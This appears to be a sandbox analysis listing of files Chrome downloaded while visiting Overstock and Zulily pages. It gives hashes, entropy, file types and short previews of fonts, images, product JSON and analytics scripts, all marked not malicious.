                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/cdn/shop/t/70/assets/belltown-book-webfont.woff2
                                                                                                                                                                                    Preview:wOF2.......$...................................?FFTM..*..*..>.`..V.B..e.....`..5.6.$..H..f.. ..$..k..4?webf.[R.q.mK..f.$....Z.x...@i.....v.....-..}....Ie.M.L[.U.W..,..# 8..2.y.s..Y....e.v.v.p7.$.?Ay...&...~&"s@.{F.q,..9=......QP..{.q..cM=4..J..yE..C..P).W.....O.~....\h...C..d.".)...!.e.d}.")....h.QX...&.....D.C]..O.?.o....D....V...*X...s....b......S.....U....M.+.6...M.s...((&X........"*F.(.5.X........^...|d.d....>(.S......g.....h.. ....G< ..i7....A(.G.&%.O...m9..)|..Y.rM..@U..V.".i*....v.%.qu.x....m..+Y..9.;!'.aD.riG....4..C....*;.......M..?@]X.'....QX..E..<y.i:.2.X......d.........6m....}....n....e.LU.j.-...fjeX..A......{a.%.G..D.....I......^....L..{.P..Z..d.......q..G.....0P..Hk......)P..6.Q.1..=N.|.r.,.....l.P>..p8...06<...L........#.....\}.>..w.k.s6.$....w....h....................Bh..#.`P.........z..MD.C.88,a#x..k...|..s2f.EJ3.LE.SC...j8..Y.^.rh.#.._....n...Y...B..@..x.).}O{8...V.....@..RC..M....i-.<.F..HJC.].A.&.7GJ..B8]7.....A....q
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1048)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2495
                                                                                                                                                                                    Entropy (8bit):5.2908819638062585
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:FJ1az2WNX6IMj5wB/tOQ2KaHQJUGVj9suV3tpYFxmwUnhZEa3:FJ174XejuB/aKaHQJUGB9suVobuhSa3
                                                                                                                                                                                    MD5:FAAE03EB623AF7C8223DEAC19713146D
                                                                                                                                                                                    SHA1:3B49BAFA4B90344AB8F5AB66AA53F9B17D8DFC70
                                                                                                                                                                                    SHA-256:C4CBC36C526887751F0EEDECBE9B048CF0A8E5E580D46ED5D869D9C2C2A32E33
                                                                                                                                                                                    SHA-512:B08F35494844929C9348B5059140322B27D57F8D46C0488BCA065940CA15804F8B65002FE1FDEA1A7C9E4A37807B4AA17AD94775AE4896D7173CE489E99F1411
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://tags.tiqcdn.com/utag/overstock/main/prod/utag.129.js?utv=ut4.46.202206231948
                                                                                                                                                                                    Preview://tealium universal tag - utag.129 ut4.0.202409301659, Copyright 2024 Tealium.com Inc. All Rights Reserved..try{(function(id,loader){var u={};utag.o[loader].sender[id]=u;if(utag===undefined){utag={};}if(utag.ut===undefined){utag.ut={};}if(utag.ut.loader===undefined){u.loader=function(o){var a,b,c,l;a=document;if(o.type==="iframe"){b=a.createElement("iframe");b.setAttribute("height","1");b.setAttribute("width","1");b.setAttribute("style","display:none");b.setAttribute("src",o.src);}else if(o.type==="img"){utag.DB("Attach img: "+o.src);b=new Image();b.src=o.src;return;}else{b=a.createElement("script");b.language="javascript";b.type="text/javascript";b.async=1;b.charset="utf-8";b.src=o.src;}if(o.id){b.id=o.id;}if(typeof o.cb==="function"){if(b.addEventListener){b.addEventListener("load",function(){o.cb();},false);}else{b.onreadystatechange=function(){if(this.readyState==="complete"||this.readyState==="loaded"){this.onreadystatechange=null;o.cb();}};}}l=o.loc||"head";c=a.getElementsByTagNa
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (24579), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):24579
                                                                                                                                                                                    Entropy (8bit):5.447330328895334
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:nU/7Ry5ZLXYrXfN2eQIvTnjypVeV3bjFechiQuIz:W7RCubfNkIvTnWuhbQchiIz
                                                                                                                                                                                    MD5:7987C9D1A0CBBBA2B9FC09FAC353D83D
                                                                                                                                                                                    SHA1:F07E2DAB7271202F892EF3C8200D0743B35C78C6
                                                                                                                                                                                    SHA-256:0FA0B7F5A235064C82A3060A94F4A27E3D2CF5F4D4016296076123746145A91C
                                                                                                                                                                                    SHA-512:7824EC151F911B299DC4DEFCB76C7CEF74470C877199B1E2E9491CB37362245BEF6F7956F54D3A4030431539BFEABDFF905550F19B3305CCB69D8448314FF466
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/page-triggers.41.chunk.0fa0b7f5a235064c82a3060a94f4a27e3d2cf5f4d4016296076123746145a91c.js
                                                                                                                                                                                    Preview:"use strict";(self.webpackChunkpage_triggers=self.webpackChunkpage_triggers||[]).push([[41],{2543:function(e,t){Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;t.default=function(){return function(e){if(window)try{window.dataLayer=window.dataLayer||[],window.dataLayer.push(e)}catch(e){console.error("Error pushing to dataLayer: ".concat(e))}}}},41:function(e,t,n){var i=n(5318);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var a=i(n(7757)),r=i(n(3038)),o=i(n(8926)),l=n(8661),s=i(n(5697)),c=i(n(2325)),d=i(n(8291)),p=i(n(113)),u=i(n(2020)),f=n(2759),m=n(6584),g=function(){var e=(0,o.default)(a.default.mark((function e(t){var n,i,r,o,l,s;return a.default.wrap((function(e){for(;;)switch(e.prev=e.next){case 0:return n=(0,f.clientConfig)("API_URL"),e.prev=1,e.next=4,fetch("".concat(n,"offers/me"),{method:"POST",headers:{cookie:t,Accept:"application/json","Content-Type":"application/json; charset=UTF-8"},credentials:"include",body:JSON.stringify({acceptedOf
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):48316
                                                                                                                                                                                    Entropy (8bit):5.6346993394709
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                    MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                    SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                    SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                    SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):31268
                                                                                                                                                                                    Entropy (8bit):7.977179072751586
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:szAuvhuOsmksf3YfR4HfXoOEIbIRibF1oC:sHYO5ksfofAo/hq5
                                                                                                                                                                                    MD5:791E8535BC455FC3470D6605589A7544
                                                                                                                                                                                    SHA1:BE3487E1D12FC385BA4D5FE269ED8EE313C8BAAA
                                                                                                                                                                                    SHA-256:F3E79CADC83AEFCFAE9A71970EA2F993202CBA6E7395672B41AC506F8AD89E2A
                                                                                                                                                                                    SHA-512:04F7D50F0399BFB03245C7AA3F0857F162569BE65EC6B2D3DE091E24D5CD8404A7271DE353A1229E5F76917A8B5483AEF942ACD618B8A94A4856A19AB82A5E13
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/10212024-MOPS-645x187_DSK_Bento02.jpg?v=1729531877&width=800
                                                                                                                                                                                    Preview:RIFF.z..WEBPVP8X....(.........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .w......* ...>9..C.!.... ...7g...>o...|..c.FtF.NS..g<......r..?).=...w.[.........].A../......'.?..~.........?........a...w.o.?po.?............o... =..C..........?......[.s......./.....................O...}p?..........G.G....._B...............................'.......1.O].o......yS..R?........_...}.......#.S.......?..m..~...}...^.....w..Y.A...[...G......../............{.......o..0.....U...........f.K...;........?........i.......................v.._...Q..*...B.{[ @.@.@%.....x...ayN.n..{T...(pI|..5/.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):177825
                                                                                                                                                                                    Entropy (8bit):5.328756491015198
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:KB6qADwxsSoCzhesk2mqhGIhvK+WqakIRd56hDMZIQkDbxrMO:KbxAO
                                                                                                                                                                                    MD5:DF356F1B38E8FB0712FCC75483360190
                                                                                                                                                                                    SHA1:6C1D44F1E3CF74A1658CA56A4ED64DBCAC2C8468
                                                                                                                                                                                    SHA-256:C33D4AA5F91687523ACAF9C23B07351FBDC4AE39288F91EEAE4D50C5D0FB4869
                                                                                                                                                                                    SHA-512:016C4532113876B6D9A1AB2059FE8132EDAD4704F7731094BCED18815F948B0FA221E02AAEB4DC7495C342AA171688516DB73DF40303E97B096312805D754B20
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/products/mia-oversized-modular-sectional-fabric-sofa-38169103.js?app=gfgfreegift
                                                                                                                                                                                    Preview:{"id":9259088707743,"title":"Mia Oversized Modular Sectional Fabric Sofa","handle":"mia-oversized-modular-sectional-fabric-sofa-38169103","description":"\u003cp\u003eElevate your living space with the oversized modular sofa set, a blend of timeless elegance and contemporary comfort. Our sectional sofas feature a clean design, wider seats, and luxurious padding, providing the perfect retreat for relaxation. Versatile configurations cater to any space, making it the ideal choice for both cozy evenings and entertaining guests. Experience the embodiment of personal comfort with the modular sofa, where every moment is an indulgence in serenity and contentment.\u003c\/p\u003e\n\u003cp\u003e\u003cstrong\u003eFeatures:\u003c\/strong\u003e\u003c\/p\u003e\n\u003cul\u003e\n \u003cli\u003eClean and classic design with comfortable and wider seats\u003c\/li\u003e\n \u003cli\u003eModular pieces for easy rearrangement to fit any living space\u003c\/li\u003e\n \u003cli\u003eAccommodates both small a
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):18
                                                                                                                                                                                    Entropy (8bit):3.4193819456463714
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YAsf4:YAsQ
                                                                                                                                                                                    MD5:C07FE8D0C031632D49B937F7B64CC318
                                                                                                                                                                                    SHA1:B50FF5D4241ED1D437505098707C289683F62ACF
                                                                                                                                                                                    SHA-256:9B5179EA2A77FE69B294FBD2ED504EACBFBE048EDE58967B43AF2CA537144B1F
                                                                                                                                                                                    SHA-512:394C5DA339B99343711A35BCF088CB6EA5E93462616B6E5A2085182F55B63206ADA99E4A429B332170F958F2ACBEB57B9623AF1B96CEA288E34BCDE693541723
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"eligible":false}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (61318)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):73999
                                                                                                                                                                                    Entropy (8bit):5.45922969241985
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:qYWvuPAadRXadFil26aAn7t2npMvCm+uGYD8BQrEWvyElVlqZw4aN8uDvz6TCLIj:qYW2Pj5yO7t2ACRg8398ge6LVR
                                                                                                                                                                                    MD5:E086EB99F82EC44B680D257D5BE0B958
                                                                                                                                                                                    SHA1:CEBCFA97EC2A5AD846DC10B3828AB9CE52697131
                                                                                                                                                                                    SHA-256:EB0BF3DD6AE4822473C0AD32270225E33AC11805AFE695AB4493D1E6C3B2E34F
                                                                                                                                                                                    SHA-512:59BA14B284BCC8DA4226337B28B05F70D60204205AA937A3F58F6AACC470507DBCE40E7D5CE68A4FE512B203870D5FED7BB07AFC3209565E7713542DCB261C29
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-17006751@84/sandbox/modern/
                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <title>Web Pixels Manager Sandbox</title>. <script type="text/javascript">. (()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));va
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 480x480, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):17886
                                                                                                                                                                                    Entropy (8bit):7.989147313168648
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:pzFc40ELNB8Ut5SM7oM5NEXDtZIcQMACk99p4RJIsygMfqeEv:pR868UtJ7vjEDcZgRJIsBW6
                                                                                                                                                                                    MD5:C3962F92A1E8A29B3066CAEBEEA86A4D
                                                                                                                                                                                    SHA1:DDB5122E0E92FC6FCD643B724ABF030DF91A72E3
                                                                                                                                                                                    SHA-256:61B9A18C401CD68DBDBF0AFFB944AA8A042DB48A9A91B877DE2101D442456045
                                                                                                                                                                                    SHA-512:1C8022EB6C68E14E1681141985BA57075F3C559C043E9C5145AE4DF3520264049B43D7A7ED3F35AAD50022425945076031C8A8CFDC27341E06B02AD1C550CA9F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/images/products/is/images/direct/21bce1a6f4028e0f8b6bd8837de082bfcb656002/Crestway-Navy-Blue-Solid-Wood-Rustic-Entryway-Console-Table.jpg?imwidth=480&impolicy=medium
                                                                                                                                                                                    Preview:RIFF.E..WEBPVP8 .E...b...*....>.N.L&$&.'4.q...en{..y...e.....y....t.M8.U....y.....?.z.......3......b.;.[O.[.....|m../.].?.g_...8...........y...oP.'....}..]..C....p*..=.r......qR....dk.y,j'.04..br.k..808k.V./..........?..=...\...o+....=.F.`G.V...=E.N...dJdm9{.J.H._|(..sA....j..;......".u......z.ESB.$c....[8"._B.e.Rb...xH...H....W..9rQ........<.[.>....M.H.[....\..+..v..M=.oX+.....r{l.:.%..$`."... .bdzRK..H.f..,.....Z.jR.Ce...Z..0..y.A...g.^....7.......eT..=....;.49e5......|7.>Q.8.f...u~.....x.ci...q..B4.......^..X.d../!+..d..X.0.7H.. .T\...0}./.\.|f.h.......">.k.m..]....6..?..5!Y..z.B..,....7.)....nUEF-h..{^A....I..N..;!...D..]a.h../(.p...b.2..Ry.#.P2=.SKlN,....'T..N]..+\..B...^...C....|4...K/..G...iuv.......Z...."....d.A..c.S.I."cY..v..?.%cE...:.$.....{1...*.%'..x.%%.t.]..=i.Ee|.8.X...*.+...jC5.8.~m..&6.jv.yS.h.:....n_+Y.a.....?=z.....].rQr8..[0..R.l..:...].."'Yo. .8A..(..)%...Ct.*.....H.%......c..c.5.u..eQ/......>..LX.....$m...I.....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 491 x 114, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):7026
                                                                                                                                                                                    Entropy (8bit):7.9322869853309586
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:l0FBh+X+BpGjevBix7QoqY9ci/CJlmmschqHehE4OTpVd5:l0bhyV2Bw79dKJIk89T/d5
                                                                                                                                                                                    MD5:6CEDACB2CE89EBA864352DF545A174C4
                                                                                                                                                                                    SHA1:530970678238E48BF50025A7A402A65A1C322EC1
                                                                                                                                                                                    SHA-256:4BC18BAFE6A98379F43D2F9B4A3A42A1EEBAFB8F900168F1A9BDC1762662A7A8
                                                                                                                                                                                    SHA-512:2DC5D7B856D82C781F765E67AB459CDDA64AAB999162C3F6516187F786B094FC0E11DBE44F286B88F25A04DE9A1B22E7B0FA7531C6ED4A6626C1E0D9987C828E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/s/files/1/0633/7105/1167/files/checkout-ostk-logo-white_x320.png?v=1711576159
                                                                                                                                                                                    Preview:.PNG........IHDR.......r.....s......$eXIfII*.......<...............imagery4..'=......pHYs.........&.:4....sRGB.........gAMA......a.....IDATx..K....q...7.6.t..(...=.&;;RX..a.H4;..b6...Hx....)..),..d.$.....L B`.C.1....#..._Rnn...S.T....I-.}...N..9.s...{.!..B.d ..~ !..BH.P..!...X.B.!.C.&..B".bM.!.D...B....5!...9.kB.!$r.B..X.6..8.l.l:Y....B.!..h.X?...d[*....O...%c.l.|=.L.L.!....m-7.........vt...3..cS.7.y#!..B....N.qz~d.5..{..T..+......B.i...k..a....2;u"....o..M.!.......g.....E....7h.'.......Sw'`.5/B.6.y)......B.i.Q..!..'.....$$4..B......U...4N.!$V..k....=.P~4...!..H.b=.kG2:q0..cW......Gi.'......5........c....o..h.B.i...`...K#*.N...\_:B.h.B.!MR.X7.&..B.H-bm-.J.!....T.%.+3).B.!.`b...4!......5L...~.&oB.!.....~..C..g~..B.!.......$....|/Y.k{....<.......3_$wff..g.%..o......!$ ..z.3Oe.+...n......uu_.\...?'WO.1..G.!1.}.....8|\.. ..'.._.?@......}.N..cY.4.nv4#.4.Pj).4.......b.{.P.#.E$/..M%..OQ..!..j...../}7...w..i.c7.....5Q..s.A..hF........1.7....P..z.g.Q.......
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1741
                                                                                                                                                                                    Entropy (8bit):6.486603399433263
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:N7+CIl/X2YlXWI2PULxZYcLTdbPu3cHSwwNk+36mpWK/oBb1Z0p/Xntu:NBIl/XflVxFLhvHtWkAdkKABbgp/Xtu
                                                                                                                                                                                    MD5:FFBE8DDF8460D5B37ECE00B21389901D
                                                                                                                                                                                    SHA1:5FE6F194393D0CC1C16E5855AEFB534DC9F20E63
                                                                                                                                                                                    SHA-256:15C1B2757A35963DB736990D19C9C4F67B189AE4E1CD6121101C1B03FB83A591
                                                                                                                                                                                    SHA-512:7FF6DCA49D91FA2B2DAB9109D7E9A5CBA65350B18DC35533FF47D249925C07264BF03ABC3A457970F51E50C029893B29B0D0D8789D3BA3F6C0BBEBE0431F9CD6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P........................................................................................!...M..@.=...v....n...gx.n.l._+;j..7..Msd^A...:*..*G.Ms$nCo.Kr....J......4G.............@.........................!.1A....."Qas
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):18
                                                                                                                                                                                    Entropy (8bit):3.3502090290998976
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:dRYto:Tuo
                                                                                                                                                                                    MD5:E000ACEF32012A650D8C243D77C7302C
                                                                                                                                                                                    SHA1:50624C2BAE8FE1A6DA065AB4BCA1C96822AE1820
                                                                                                                                                                                    SHA-256:E3933184560739B70B60E2D0E48A6C7D7E18F76D95362E11F4155267700AC3A7
                                                                                                                                                                                    SHA-512:D88E2A944FB1B88903CB2B7E207AE289C01770C3FD30A9A76F2031CAECC048AD474603FE393056F9C6E1A34BC6DD6A626CAD90773871095D11CED1241F49C061
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:Method Not Allowed
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):12634
                                                                                                                                                                                    Entropy (8bit):7.92613088011889
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:IJnif/kMPHGB2fXGuG4KGxx8FTKWioGwAWBadVJEwkxN:I97MP/XGujAKWtITdLEwA
                                                                                                                                                                                    MD5:B67B1AE7E00702F8C22DECFA4964BBA3
                                                                                                                                                                                    SHA1:815D1A3F3931E91BAF431F692B2873B213F2237C
                                                                                                                                                                                    SHA-256:649D62C6A7842D4E25ED30B57634C8F321E290ABE33BE65161A2A0A7901BB5EA
                                                                                                                                                                                    SHA-512:5A7F9A802B671F6771CE2058A10EFE35E900FB70C8576B598124C9D57EFDA2995D4FEECCF833A8844C31DD29E54245E1F7FC62BD2CACA7419B3AACFBA6FAE555
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/cdn/shop/collections/AV_SENJI_IMAGE.jpg?v=1730211868&width=800
                                                                                                                                                                                    Preview:RIFFR1..WEBPVP8X....(...K.....ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*L...>=..E"!..9. ...{..W.....W{.....Z./.r...O..]Oy..wc._7.......c._.......<...x.......q.4......P.....{.w.......}...._...2......PO.o.o.<..#.....7....................?....../....d..g..>..|...4..h/..U.'.lN....8.bp6..F...{Ux....U...W_1..L....I_F..B..5..4.*.R.l.6R...s.M...9R.=<.T..G.e(.$|.R..2M.f...a.Q...t...../{D...j_g.&lQp..:J......=...Si..?.....~......-.3b.=h}...n...(.4.7......a.....b...(.:....1(S....I.2.J..h'..>..n.0.h.....?..A..!..pu[o..L....6..m.(.>...9.Hm......'.lN..4/...f.r.f..=.N.!
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, progressive, precision 8, 516x516, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8640
                                                                                                                                                                                    Entropy (8bit):7.742235153288705
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:W58uVssu6XghcH5XJ5soNXK6WZvBs7Eq/iNwD1kaU2AKTAfX1G:m8UssouXJ1K/K7Eq/pR02A821G
                                                                                                                                                                                    MD5:D47ACC64EA7E06857AA4D958F5F48963
                                                                                                                                                                                    SHA1:D064CEA7F82EE83E8D195A2D339A8F10E11AFFC6
                                                                                                                                                                                    SHA-256:C478AD393423699527B153BD14EDB568E306B2D4E3A56A1352666FD0364C8092
                                                                                                                                                                                    SHA-512:8FE2EC7E380646160CFF310505A99A1DC5EAD4C8612CD5B06F2D5C1BDB1CFF295AD0F20E774624E3B316E7EBD5814B9A1276218DC877FE13E986EE03FBFEA016
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......JFIF.............................................. ......... .0.".%.".%.".0.I...5.....5...I.A.N.@.;.@.N.A.t.[.Q.Q.[.t...q.k.q.....................g................................ ......... .0.".%.".%.".0.I...5.....5...I.A.N.@.;.@.N.A.t.[.Q.Q.[.t...q.k.q.....................g..........."..........1..............................................................H...............................................................................................................................>#Y...?....-...F..Y=...z.t>...}...|.....|>.O.'.x..^.........x.P{......k. ...'.xX=..I./a.....z..........G.r...u...._.it.T.R(ilF..+.u$.*Zk....EcKeS[a.!......z..5_.y...............~....u...3..!.f[...U..KV..SfU5f]kA.86.V/Z.M"]').kRYAy.K.Rh..zO1.~.9.............<u{.v......)....u*j.i....VR^s%...X..l....*-4.D...5......Q.`......"G...F......>...|...A....>S.........><.....Z......)......A.....u..>co.I.'.K.W.Q...........>..b..U.g[.........58..-c....T.K.5.g.........1.f.o..*...n...d..9...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1464
                                                                                                                                                                                    Entropy (8bit):6.066405633903878
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:N7+CIl/X2YlXWI2PULxZpAesOCPFELkUb9Uold2XsfE8kNkmh3:NBIl/XflVxPAeMFSaXeE8kNkW3
                                                                                                                                                                                    MD5:8466450CEC7892E043BE5D392BB79BE6
                                                                                                                                                                                    SHA1:BA17557AFAF24BE2D8AA480F7CD18E27D504B037
                                                                                                                                                                                    SHA-256:A72E1C151267D369A4F9764E72C796C7B641054C54B9873CA04EBCD838C198A7
                                                                                                                                                                                    SHA-512:FC3C51A2EE382587583D1C54F43B7239CA4B645F41817807664D0128605AEDCF8F157A828F6EB0BD12BF305FB54E165994ECA2AA1EABD555920CE7A4120FCD8C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
